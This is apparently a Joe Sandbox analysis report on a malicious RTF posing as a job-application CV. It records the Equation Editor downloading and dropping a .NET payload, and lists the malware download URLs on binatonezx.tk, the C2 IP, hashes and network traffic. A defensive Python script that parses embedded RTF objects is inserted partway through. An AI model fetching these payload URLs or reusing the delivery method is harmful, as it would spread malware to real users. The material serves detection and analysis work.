http://servername/isapibackend.dll | explorer.exe, 00000006.00000000.509688161.0000000003E50000.00000002.00020000.sdmp | false | Avira URL Cloud: safe | low

                                              Contacted IPs


                                              Public

IP | Domain | Country | ASN | ASN Name | Malicious
2.56.59.211 | binatonezx.tk | Netherlands | 395800 | GBTCLOUDUS | true

                                              General Information

                                              Joe Sandbox Version:33.0.0 White Diamond
                                              Analysis ID:510259
                                              Start date:27.10.2021
                                              Start time:16:41:26
                                              Joe Sandbox Product:CloudBasic
                                              Overall analysis duration:0h 12m 1s
                                              Hypervisor based Inspection enabled:false
                                              Report type:light
                                              Sample file name:C.V_Job Request.doc
                                              Cookbook file name:defaultwindowsofficecookbook.jbs
                                              Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                              Number of analysed new started processes analysed:11
                                              Number of new started drivers analysed:0
                                              Number of existing processes analysed:0
                                              Number of existing drivers analysed:0
                                              Number of injected processes analysed:1
                                              Technologies:
                                              • HCA enabled
                                              • EGA enabled
                                              • HDC enabled
                                              • AMSI enabled
                                              Analysis Mode:default
                                              Analysis stop reason:Timeout
                                              Detection:MAL
                                              Classification:mal100.troj.expl.evad.winDOC@9/10@2/1
                                              EGA Information:Failed
                                              HDC Information:
                                              • Successful, ratio: 21.6% (good quality ratio 20.9%)
                                              • Quality average: 78.7%
                                              • Quality standard deviation: 25.8%
                                              HCA Information:
                                              • Successful, ratio: 100%
                                              • Number of executed functions: 0
                                              • Number of non-executed functions: 0
                                              Cookbook Comments:
                                              • Adjust boot time
                                              • Enable AMSI
                                              • Found application associated with file extension: .doc
                                              • Found Word or Excel or PowerPoint or XPS Viewer
                                              • Attach to Office via COM
                                              • Scroll down
                                              • Close Viewer
                                              Warnings:
                                              • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, conhost.exe, svchost.exe
                                              • TCP Packets have been reduced to 100
                                              • Not all processes were analyzed, report is missing behavior information
                                              • Report size getting too big, too many NtCreateFile calls found.
                                              • Report size getting too big, too many NtEnumerateValueKey calls found.
                                              • Report size getting too big, too many NtQueryAttributesFile calls found.

                                              Simulations

                                              Behavior and APIs

                                              Time | Type | Description
                                              16:42:19 | API Interceptor | 47x Sleep call for process: EQNEDT32.EXE modified
                                              16:42:21 | API Interceptor | 74x Sleep call for process: seasonhd72463.exe modified
                                              16:42:45 | API Interceptor | 117x Sleep call for process: msiexec.exe modified
                                              16:44:16 | API Interceptor | 1x Sleep call for process: explorer.exe modified

                                              Joe Sandbox View / Context

                                              IPs

                                              Match | Associated Sample Name / URL | Detection | Context
                                              2.56.59.211 | Purchase order.doc | malicious | binatonezx.tk/villarzx.exe
                                              2.56.59.211 | Swift-copy.doc | malicious | binatonezx.tk/obinnazx.exe
                                              2.56.59.211 | RFQ for _RTO system packages product details.doc | malicious | binatonezx.tk/stanzx.exe
                                              2.56.59.211 | Purchase order_122.doc | malicious | binatonezx.tk/catzx.exe
                                              2.56.59.211 | SMC Req Offer.doc | malicious | binatonezx.tk/seasonzx.exe
                                              2.56.59.211 | Original Shipping documents.doc | malicious | binatonezx.tk/villarzx.exe
                                              2.56.59.211 | payment.doc | malicious | binatonezx.tk/davidhillzx.exe
                                              2.56.59.211 | _Payment Advise.doc | malicious | binatonezx.tk/trulexzx.exe
                                              2.56.59.211 | FLOW LINE CONTRACT00939.doc | malicious | binatonezx.tk/asadzx.exe
                                              2.56.59.211 | QUOTE B1018530.doc | malicious | binatonezx.tk/mazx.exe
                                              2.56.59.211 | About company.doc | malicious | binatonezx.tk/gregzx.exe
                                              2.56.59.211 | Purchase order_122.doc | malicious | binatonezx.tk/catzx.exe
                                              2.56.59.211 | PRICE QUOTATION.doc | malicious | binatonezx.tk/seasonzx.exe
                                              2.56.59.211 | PROFORMA INVOICE.doc__.rtf | malicious | binatonezx.tk/obinnazx.exe
                                              2.56.59.211 | Purchase Order.doc | malicious | binatonezx.tk/villarzx.exe

                                              Domains

                                              Match | Associated Sample Name / URL | Detection | Context
                                              binatonezx.tk | Purchase order.doc | malicious | 2.56.59.211
                                              binatonezx.tk | Swift-copy.doc | malicious | 2.56.59.211
                                              binatonezx.tk | RFQ for _RTO system packages product details.doc | malicious | 2.56.59.211
                                              binatonezx.tk | Purchase order_122.doc | malicious | 2.56.59.211
                                              binatonezx.tk | SMC Req Offer.doc | malicious | 2.56.59.211
                                              binatonezx.tk | Original Shipping documents.doc | malicious | 2.56.59.211
                                              binatonezx.tk | payment.doc | malicious | 2.56.59.211
                                              binatonezx.tk | _Payment Advise.doc | malicious | 2.56.59.211
                                              binatonezx.tk | FLOW LINE CONTRACT00939.doc | malicious | 2.56.59.211
                                              binatonezx.tk | QUOTE B1018530.doc | malicious | 2.56.59.211
                                              binatonezx.tk | About company.doc | malicious | 2.56.59.211
                                              binatonezx.tk | Purchase order_122.doc | malicious | 2.56.59.211
                                              binatonezx.tk | PRICE QUOTATION.doc | malicious | 2.56.59.211
                                              binatonezx.tk | PROFORMA INVOICE.doc__.rtf | malicious | 2.56.59.211
                                              binatonezx.tk | Purchase Order.doc | malicious | 2.56.59.211

                                              ASN

                                              Match | Associated Sample Name / URL | Detection | Context
                                              GBTCLOUDUS | Purchase order.doc | malicious | 2.56.59.211
                                              GBTCLOUDUS | setup_installer.exe | malicious | 2.56.59.42
                                              GBTCLOUDUS | Swift-copy.doc | malicious | 2.56.59.211
                                              GBTCLOUDUS | jGK42jrs2j.exe | malicious | 2.56.59.42
                                              GBTCLOUDUS | DDEEBC8CCCC58E25CE1709B0E9A519B2BD46472E92860.exe | malicious | 2.56.59.42
                                              GBTCLOUDUS | p3IJWYfJZw.exe | malicious | 2.56.59.42
                                              GBTCLOUDUS | RFQ for _RTO system packages product details.doc | malicious | 2.56.59.211
                                              GBTCLOUDUS | Purchase order_122.doc | malicious | 2.56.59.211
                                              GBTCLOUDUS | SMC Req Offer.doc | malicious | 2.56.59.211
                                              GBTCLOUDUS | Original Shipping documents.doc | malicious | 2.56.59.211
                                              GBTCLOUDUS | 6FD5C640F4C1E434978FDC59A8EC191134B7155217C84.exe | malicious | 2.56.59.42
                                              GBTCLOUDUS | setup_x86_x64_install.exe | malicious | 2.56.59.42
                                              GBTCLOUDUS | 0OeX2BsbUo.exe | malicious | 2.56.59.42
                                              GBTCLOUDUS | AB948F038175411DC326A1AAD83DF48D6B65632501551.exe | malicious | 2.56.59.42
                                              GBTCLOUDUS | 365F984ABE68DDD398D7B749FB0E69B0F29DAF86F0E3E.exe | malicious | 2.56.59.42
                                              GBTCLOUDUS | C03C8A4852301C1C54ED27EF130D0DE4CDFB98584ADEF.exe | malicious | 2.56.59.42
                                              GBTCLOUDUS | Fri051e1e7444.exe | malicious | 2.56.59.42
                                              GBTCLOUDUS | payment.doc | malicious | 2.56.59.211
                                              GBTCLOUDUS | _Payment Advise.doc | malicious | 2.56.59.211
                                              GBTCLOUDUS | wA5D1yZuTf.exe | malicious | 2.56.59.42

                                              JA3 Fingerprints

                                              No context

                                              Dropped Files

                                              No context

                                              Created / dropped Files

                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\seasonzx[1].exe
                                              Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                              Category:downloaded
                                              Size (bytes):526336
                                              Entropy (8bit):7.5320170434389455
                                              Encrypted:false
                                              SSDEEP:12288:PG9ImHKQ6MQ0vN3h4Ip/uzEcrPuRj42GT:eJGA3h4Ip/uzrPAbG
                                              MD5:9227463FFB6E37D271919E06D175EDA7
                                              SHA1:549CCA1BD4031F3D302832754A1F3E51FFED065F
                                              SHA-256:5E529CBB901ACED8A6AF49250AFD3D67E059D717D7ECF3EDC32E18A9D549361C
                                              SHA-512:3C2673D5CA3BE9C723B8D34185299459A53F0D99B3F8ABD2821B73299D6DE83257CD4E850AC635C53598EB8CBD9574EE103B781C7C6952B69F2C6EE8C9B3E60B
                                              Malicious:true
                                              Antivirus:
                                              • Antivirus: ReversingLabs, Detection: 23%
                                              Reputation:low
                                              IE Cache URL:http://binatonezx.tk/seasonzx.exe
                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....xa..............0.............>.... ... ....@.. .......................`............@.....................................O.... .......................@....................................................... ............... ..H............text...D.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................ .......H..................t....|..............................................&.(......*...0..H.............s..........~..........(......~.........,.s.............,..(......*........#<.......0.............+..*..0...........s.....+..*..0...........sR....+..*..0...........sT....+..*..0...........s.....+..*..0...........s.....+..*..0...........s.....+..*..0...........s.....+..*...}......}.....(.......r...p}....*z..}......}.....(........}....*...}......}.....(........}......}....*...}.
                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{4A35DA17-E94D-4691-827C-120A276E213C}.tmp
                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                              File Type:Composite Document File V2 Document, Cannot read section info
                                              Category:dropped
                                              Size (bytes):177152
                                              Entropy (8bit):7.968894553436934
                                              Encrypted:false
                                              SSDEEP:3072:5r+OFkZ8MtvknSS6grNZM3dVeqIoUxnVWWwRJZgaepJWma515A:5x27JkSS6KNZSXVnWSoaKam
                                              MD5:A6222C96BEC0E96BECCD2EF405CBC8C4
                                              SHA1:442B799CBCA7A1D526C31AB2B82C0C3E452AFF23
                                              SHA-256:6F64549B2D015CCA2E0CCDBAAFE166640C004367D2F75B316D7620EEB597083C
                                              SHA-512:3FAADCE5A243020431C5B191ABE03610AECA2AA6271C6E5B040749F5A510FA6BB929F0B722D0D1C2047F2D00F1C319284AC1268659BC22FB5E6F5799C4ED88A9
                                              Malicious:true
                                              Antivirus:
                                              • Antivirus: Avira, Detection: 100%
                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                              Reputation:low
                                              Preview: ......................>.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................W........................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...
                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{7F12DB12-48BF-46DA-B084-D7B910635C9B}.tmp
                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):1024
                                              Entropy (8bit):0.05390218305374581
                                              Encrypted:false
                                              SSDEEP:3:ol3lYdn:4Wn
                                              MD5:5D4D94EE7E06BBB0AF9584119797B23A
                                              SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                                              SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                                              SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                                              Malicious:false
                                              Reputation:high, very likely benign file
                                              Preview: ........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{99A74BA1-7084-4250-8A29-E85A11395DDC}.tmp
                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):13312
                                              Entropy (8bit):3.5864344325374753
                                              Encrypted:false
                                              SSDEEP:384:db9nvMlWW4cPwZY8APS+oX9Y52wBvvTKBkZ:db9nvsgcPwOPUY5HBGBkZ
                                              MD5:99BD4E7DE3940A04A671C43E8132D001
                                              SHA1:8518B09DEDC04133804F6E6F538C83A2FACC0208
                                              SHA-256:FB31FF316F5CD02FA92BB0153268076174D356631D2AF4B8D41F5231720ABEAB
                                              SHA-512:BC6D7FD0AE073CE562A627E0F7C060F4CB1898CDD34F9B53251B3FBC507A132BDEA824E34EE33A8091D95197C5B66FEEE1BA0AF1328F0B0A7AE653CFA11E4633
                                              Malicious:false
                                              Reputation:low
                                              Preview: ).=.7.#.%.&.1.?.0.>.3.`.,.(.?.5.-.7.`.!.9.=.).9...).1.?.$.`.!.].6.?.`.|.`.4.?.%.<.0.....3.#.3.5.4.8.?.-.<.,.8.%.*.+.?.!.9.5.=.2.[.@.3.5.0.'.0.>...9.!.&.-.6.?.3.5.#.4.~./...+.,.=.|.].(.7.5.1.].<.?.%.?.6...].|.6.#.-.].6.^.0...?.~.*.,.9.*.7.6.`.7.8._.?./.$.?.`...%.2.2.9.1.*...~.!.~.....).1.$.'.'.?.>.2..._.).@.?.6.+.>.>.-.5...$.-.?.#.`.5...*.(.1.#.^.|.'.$.?.+.#.&.&.7...|.2.=.?.^.!.#.(...'.^..._...`./.;.).@.`.0.9.|.%.&.|.-.&.9.&.8.'.`...=...).:.>.&.[.[.>...#.).^.%.`.7.3.2.3.`.`.?.].?.4.,.^.6.-.]...?.2.?...$.`.[.-.(.#._.!.].#.?.<.;.-.<.?.~.[.^.%...$.?.?...$.<.%.^.9.6.#.!.@.9.~.&.?.7.).-.^.?._.?.(.8.-.?...?.2.;.|.^.^.|.%.9.?.%._...?.&.].6.[.:...?...#.,.~.:.>...;.%.'.#.+.,._.2.?._.?.*.[.@.&.,.9.)...9.^.>.;./.:.&.$.!.^.4.8...=.).9.'.(.?.?.+.1.1.*.[.8.?.2.+.%.0.>.%...^.0.*.%.~.(.6.~...#.*.:.,.8.<.[.).6.+.1.5.6.$.:._.'.).@...#.!.0...%.].8...6.4.!.`.8...&.8._.#.|.[./...|...9.,.4.?.<.[.9.@.(.3...|.3...;.^.4.`.[.^.1.0.%.:.?.%.:.9.^.|.%.=.[.`.9.?.=.8.(.8.>.`.?.-.?.3...%.?./.,...;.<.(.3.?.2.`.^.?.;.6.
                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{BE99F549-07B9-491A-8DB9-68BEA2AC23A8}.tmp
                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):1536
                                              Entropy (8bit):1.3586208805849453
                                              Encrypted:false
                                              SSDEEP:3:Iiiiiiiiiif3l/Hlnl/bl//l/bllBl/PvvvvvvvvvvFl/l/lAqsalHl3lldHzlbu:IiiiiiiiiifdLloZQc8++lsJe1Mz1/
                                              MD5:3DEAB1D660801EC3E5A2A85121BD0100
                                              SHA1:AA76E24361F626EB979536BF41369287FE7F6444
                                              SHA-256:682A68677DC3D843BDF8F1F3A3CF56B748E35B976F4AD01115619A6CD080BC7D
                                              SHA-512:4F5A6BA6878C88BD08B726EB71FA0C7682E78DC5DA93CE63C33290C8A2F9375CD94FFC2C3BADEF6A04C1AC7CFBE0EFAE7BB945F2D9B1A1BBB60F80F9CB84A072
                                              Malicious:false
                                              Reputation:low
                                              Preview: ..(...(...(...(...(...(...(...(...(...(...(...A.l.b.u.s...A........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................."...&...*.......:...>...............................................................................................................................................................................................................................................................................................................................................................................................................................................
                                              C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\C.V_Job Request.LNK
                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Mon Aug 30 20:08:58 2021, mtime=Mon Aug 30 20:08:58 2021, atime=Wed Oct 27 22:42:17 2021, length=445393, window=hide
                                              Category:dropped
                                              Size (bytes):1039
                                              Entropy (8bit):4.5731093684743485
                                              Encrypted:false
                                              SSDEEP:24:8P8G0n/XTuzLIZ+GLNJeGOLzDv3qoE/7Eg:8P8G0n/XTkuNJi6oWB
                                              MD5:66DF0B78A634B21C0034107A4983E87D
                                              SHA1:3FD37B0E445CB40504527400517ECACB0C9EB0FD
                                              SHA-256:5A4483E851FB70C0B2AC567FADD2AFBEDC73F22E1CD83A0B744D8C7C4532C2EF
                                              SHA-512:8FB8421FF12EBC63933F961D0465D2F1A368C9E0569BD34D006C9EF81466BB674F7C49E403DF748EE7B76A3C4E0ECE515D4604CE7E9F7C7ACD80E9878F170472
                                              Malicious:false
                                              Preview: L..................F.... ......?......?....^.F.................................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......S ...user.8......QK.X.S .*...&=....U...............A.l.b.u.s.....z.1......S!...Desktop.d......QK.X.S!.*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....p.2.....[SI. .CV_JOB~1.DOC..T.......S ..S .*.........................C...V._.J.o.b. .R.e.q.u.e.s.t...d.o.c.......}...............-...8...[............?J......C:\Users\..#...................\\715575\Users.user\Desktop\C.V_Job Request.doc.*.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.C...V._.J.o.b. .R.e.q.u.e.s.t...d.o.c.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......715575..........D_....3N...W...9..g..........
                                              C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                              File Type:ASCII text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):81
                                              Entropy (8bit):4.796519991888395
                                              Encrypted:false
                                              SSDEEP:3:bDuMJl+LzBXo2mX1Z8Xo2v:bCBlS+L
                                              MD5:B78115C5999CBD22895610ED925C66F5
                                              SHA1:1EFDA182CFA86793A126100070301C1D1AD4C40C
                                              SHA-256:BEFE43765F3B3397789933ACDC7CAF5C0F3591BC8803A65DA48171831985985F
                                              SHA-512:1412AB4C2A622BFB8BD89DBC36277F6025E7823614C25B6BD5B3305D8B26B5BD9A0CF31913EB70998A1551EE2485DFDA512364765994D84E72CAD11A469AD827
                                              Malicious:false
                                              Preview: [folders]..Templates.LNK=0..C.V_Job Request.LNK=0..[doc]..C.V_Job Request.LNK=0..
                                              C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):162
                                              Entropy (8bit):2.5038355507075254
                                              Encrypted:false
                                              SSDEEP:3:vrJlaCkWtVyEGlBsB2q/WWqlFGa1/ln:vdsCkWtYlqAHR9l
                                              MD5:45B1E2B14BE6C1EFC217DCE28709F72D
                                              SHA1:64E3E91D6557D176776A498CF0776BE3679F13C3
                                              SHA-256:508D8C67A6B3A7B24641F8DEEBFB484B12CFDAFD23956791176D6699C97978E6
                                              SHA-512:2EB6C22095EFBC366D213220CB22916B11B1234C18BBCD5457AB811BE0E3C74A2564F56C6835E00A0C245DF964ADE3697EFA4E730D66CC43C1C903975F6225C0
                                              Malicious:false
                                              Preview: .user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...
                                              C:\Users\user\AppData\Roaming\seasonhd72463.exe
                                              Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                              Category:dropped
                                              Size (bytes):526336
                                              Entropy (8bit):7.5320170434389455
                                              Encrypted:false
                                              SSDEEP:12288:PG9ImHKQ6MQ0vN3h4Ip/uzEcrPuRj42GT:eJGA3h4Ip/uzrPAbG
                                              MD5:9227463FFB6E37D271919E06D175EDA7
                                              SHA1:549CCA1BD4031F3D302832754A1F3E51FFED065F
                                              SHA-256:5E529CBB901ACED8A6AF49250AFD3D67E059D717D7ECF3EDC32E18A9D549361C
                                              SHA-512:3C2673D5CA3BE9C723B8D34185299459A53F0D99B3F8ABD2821B73299D6DE83257CD4E850AC635C53598EB8CBD9574EE103B781C7C6952B69F2C6EE8C9B3E60B
                                              Malicious:true
                                              Antivirus:
                                              • Antivirus: ReversingLabs, Detection: 23%
                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....xa..............0.............>.... ... ....@.. .......................`............@.....................................O.... .......................@....................................................... ............... ..H............text...D.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................ .......H..................t....|..............................................&.(......*...0..H.............s..........~..........(......~.........,.s.............,..(......*........#<.......0.............+..*..0...........s.....+..*..0...........sR....+..*..0...........sT....+..*..0...........s.....+..*..0...........s.....+..*..0...........s.....+..*..0...........s.....+..*...}......}.....(.......r...p}....*z..}......}.....(........}....*...}......}.....(........}......}....*...}.
                                              C:\Users\user\Desktop\~$V_Job Request.doc
                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):162
                                              Entropy (8bit):2.5038355507075254
                                              Encrypted:false
                                              SSDEEP:3:vrJlaCkWtVyEGlBsB2q/WWqlFGa1/ln:vdsCkWtYlqAHR9l
                                              MD5:45B1E2B14BE6C1EFC217DCE28709F72D
                                              SHA1:64E3E91D6557D176776A498CF0776BE3679F13C3
                                              SHA-256:508D8C67A6B3A7B24641F8DEEBFB484B12CFDAFD23956791176D6699C97978E6
                                              SHA-512:2EB6C22095EFBC366D213220CB22916B11B1234C18BBCD5457AB811BE0E3C74A2564F56C6835E00A0C245DF964ADE3697EFA4E730D66CC43C1C903975F6225C0
                                              Malicious:false
                                              Preview: .user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...

                                              Static File Info

                                              General

                                              File type:Rich Text Format data, unknown version
                                              Entropy (8bit):4.2248396949078435
                                              TrID:
                                              • Rich Text Format (5005/1) 55.56%
                                              • Rich Text Format (4004/1) 44.44%
                                              File name:C.V_Job Request.doc
                                              File size:445393
                                              MD5:b5be29921304476377e096c60a3fb418
                                              SHA1:653d40c3e86feb11b1cc6b7745257754c296c109
                                              SHA256:fd4e52557f511c596e0d0ff58a1a7775a1295889461b73856d4aa733108e7b58
                                              SHA512:987cb27f1b49978d5dae764d61f4a0af9dff31d073e1d2a28c4d2ac2ee1a9772ef5d337878ca1e7fb18aa8d1f67affcd586336b066afff52ad46ce250de4ff97
                                              SSDEEP:6144:XTaxUCbwi30ctNoGw+JhzjbLq1M4iZsuj36wk7OMwBd6c11ONcwB9sal13uxHGMp:X2xUIwvuoD+nfh44xj06T66ObstGcL
                                              File Content Preview:{\rtf7661)=7#%&1?0>3`,(?5-7`!9=)9.)1?$`!]6?`|`4?%<0..3#3548?-<,8%*+?!95=2[@350'0>.9!&-6?35#4~/.+,=|](751]<?%?6.]|6#-]6^0.?~*,9*76`78_?/$?`.%2291*.~!~..)1$''?>2._)@?6+>>-5.$-?#`5.*(1#^|'$?+#&&7.|2=?^!#(.'^._.`/;)@`09|%&|-&9&8'`.=.):>&[[>.#)^%`7323``?]?4,^6

                                              File Icon

                                              Icon Hash:e4eea2aaa4b4b4a4

                                              Static RTF Info

                                              Objects

Id  Start      Format ID  Format    Classname  Datasize  Filename  Sourcepath  Temppath  Exploit
0   000018C9h  -          -         -          -         -         -           -         no
1   0000187Ch  2          embedded  a          175616    -         -           -         no
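The Objects table above is derived from the OLE 1.0 native stream behind each `\objdata` group (Format ID 2 is an embedded object, the Datasize is the NativeDataSize field), and the File Content Preview shows the `{\rtf7661)=...` header that Word still opens because its reader only checks for the `{\rtf` prefix. The script below is an added example, not code from Joe Sandbox or from the sample: it pulls every `\objdata` blob out of an RTF, decodes the OLE 1.0 header into the same columns as the table (format ID, class name, native data size), and flags an obfuscated header and any embedded object whose class name points at Equation Editor or the Packager. The constructed RTF, the `Equation.3` class name and the `SUSPICIOUS_CLASS_HINTS` list are assumptions for the demonstration; the object in this sample carries the classname "a".

```python
import re
import struct

# Constructed input (not the sample from the report): an RTF whose header is
# obfuscated the way the report's File Content Preview shows ("{\rtf" followed
# by junk instead of "1"), carrying one \objdata blob.  The blob is an OLE 1.0
# native stream, the structure behind the "Format ID / Classname / Datasize"
# columns of the Objects table: OLEVersion, FormatID (1 = linked, 2 = embedded),
# ClassName, TopicName, ItemName, NativeDataSize, NativeData.

OLE1_VERSION = 0x00000501
# Class-name fragments worth a second look in an embedded object (general
# triage heuristic, assumed here; not something the report asserts about this sample).
SUSPICIOUS_CLASS_HINTS = ("equation", "package", "ole2link")


def lp_ansi_string(s: str) -> bytes:
    """LengthPrefixedAnsiString: u32 byte count including the NUL, then the bytes."""
    if not s:
        return struct.pack("<I", 0)
    data = s.encode("ascii") + b"\x00"
    return struct.pack("<I", len(data)) + data


def build_ole1_object(class_name: str, native: bytes, format_id: int = 2) -> bytes:
    """Serialise an OLE 1.0 native stream with empty TopicName/ItemName."""
    return (struct.pack("<II", OLE1_VERSION, format_id)
            + lp_ansi_string(class_name) + lp_ansi_string("") + lp_ansi_string("")
            + struct.pack("<I", len(native)) + native)


def build_sample_rtf(obj: bytes) -> bytes:
    """Wrap the object in a minimal RTF with an obfuscated header and line-wrapped hex."""
    hexdata = obj.hex().encode("ascii")
    lines = [hexdata[i:i + 64] for i in range(0, len(hexdata), 64)]
    return (b"{\\rtf7661)=7#%&1?0>3`,(?5-7`!9=)9{\\fonttbl{\\f0 Arial;}}\n"
            b"{\\object\\objemb{\\*\\objclass Equation.3}{\\*\\objdata\n"
            + b"\n".join(lines) + b"\n}}}")


def is_obfuscated_header(rtf: bytes) -> bool:
    """Word only needs the '{\\rtf' prefix, so anything other than '{\\rtf1' is a red flag."""
    return rtf.startswith(b"{\\rtf") and not rtf.startswith(b"{\\rtf1")


def extract_objdata_blobs(rtf: bytes) -> list:
    """Return the decoded hex payload of every \\objdata group (brace-matched)."""
    blobs = []
    for m in re.finditer(rb"\\objdata\b", rtf):
        start = i = m.end()
        depth = 1
        while i < len(rtf) and depth:
            c = rtf[i:i + 1]
            if c == b"\\":          # skip an escaped brace or the lead byte of a control word
                i += 2
                continue
            if c == b"{":
                depth += 1
            elif c == b"}":
                depth -= 1
            i += 1
        body = rtf[start:i - 1]
        body = re.sub(rb"\\[A-Za-z]+-?\d*\s?", b"", body)   # drop control words (\bin raw data not handled)
        hexstr = re.sub(rb"[^0-9A-Fa-f]", b"", body)
        if len(hexstr) % 2:
            hexstr = hexstr[:-1]
        blobs.append(bytes.fromhex(hexstr.decode("ascii")))
    return blobs


def read_lp_string(buf: bytes, off: int):
    (n,) = struct.unpack_from("<I", buf, off)
    off += 4
    return buf[off:off + n].rstrip(b"\x00").decode("latin-1"), off + n


def parse_ole1(blob: bytes) -> dict:
    """Decode the OLE 1.0 header; raises struct.error/ValueError on junk."""
    ver, fmt = struct.unpack_from("<II", blob, 0)
    if ver != OLE1_VERSION:
        raise ValueError(f"not an OLE 1.0 native stream (version {ver:#x})")
    off = 8
    cls, off = read_lp_string(blob, off)
    _topic, off = read_lp_string(blob, off)
    _item, off = read_lp_string(blob, off)
    (size,) = struct.unpack_from("<I", blob, off)
    native = blob[off + 4:off + 4 + size]
    return {"format_id": fmt, "format": {1: "linked", 2: "embedded"}.get(fmt, "unknown"),
            "class_name": cls, "data_size": size, "native_data": native,
            "truncated": len(native) < size}


def triage_rtf(rtf: bytes) -> list:
    """Parse every embedded object and flag the ones a responder should open next."""
    report = []
    for blob in extract_objdata_blobs(rtf):
        try:
            obj = parse_ole1(blob)
        except (struct.error, ValueError) as exc:
            report.append({"error": str(exc), "blob_size": len(blob)})
            continue
        obj["suspicious"] = obj["format_id"] == 2 and any(
            h in obj["class_name"].lower() for h in SUSPICIOUS_CLASS_HINTS)
        report.append(obj)
    return report


if __name__ == "__main__":
    sample = build_sample_rtf(build_ole1_object("Equation.3", b"\x1c\x00" + b"A" * 300))
    print("obfuscated header:", is_obfuscated_header(sample))
    for obj in triage_rtf(sample):
        print({k: v for k, v in obj.items() if k != "native_data"})
```

Real droppers scatter control words and nested groups through the hex, and some embed raw bytes with `\bin`; the control-word stripping here covers the former but not the latter, so for production triage use rtfobj from oletools, which performs the same parse with those cases handled. A `truncated` result with a non-zero data size usually means the hex was cut short or further obfuscated, which is itself worth a look.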

                                              Network Behavior

                                              Network Port Distribution

                                              TCP Packets

Timestamp                             Src Port  Dst Port  Source IP     Dest IP
Oct 27, 2021 16:42:17.913721085 CEST  49165     80        192.168.2.22  2.56.59.211
Oct 27, 2021 16:42:17.943983078 CEST  80        49165     2.56.59.211   192.168.2.22
Oct 27, 2021 16:42:17.944142103 CEST  49165     80        192.168.2.22  2.56.59.211
Oct 27, 2021 16:42:17.944622040 CEST  49165     80        192.168.2.22  2.56.59.211
Oct 27, 2021 16:42:17.980179071 CEST  80        49165     2.56.59.211   192.168.2.22
Oct 27, 2021 16:42:17.983454943 CEST  80        49165     2.56.59.211   192.168.2.22
Oct 27, 2021 16:42:17.983525991 CEST  80        49165     2.56.59.211   192.168.2.22
Oct 27, 2021 16:42:17.983562946 CEST  49165     80        192.168.2.22  2.56.59.211
Oct 27, 2021 16:42:17.983584881 CEST  49165     80        192.168.2.22  2.56.59.211
Oct 27, 2021 16:42:17.983601093 CEST  80        49165     2.56.59.211   192.168.2.22
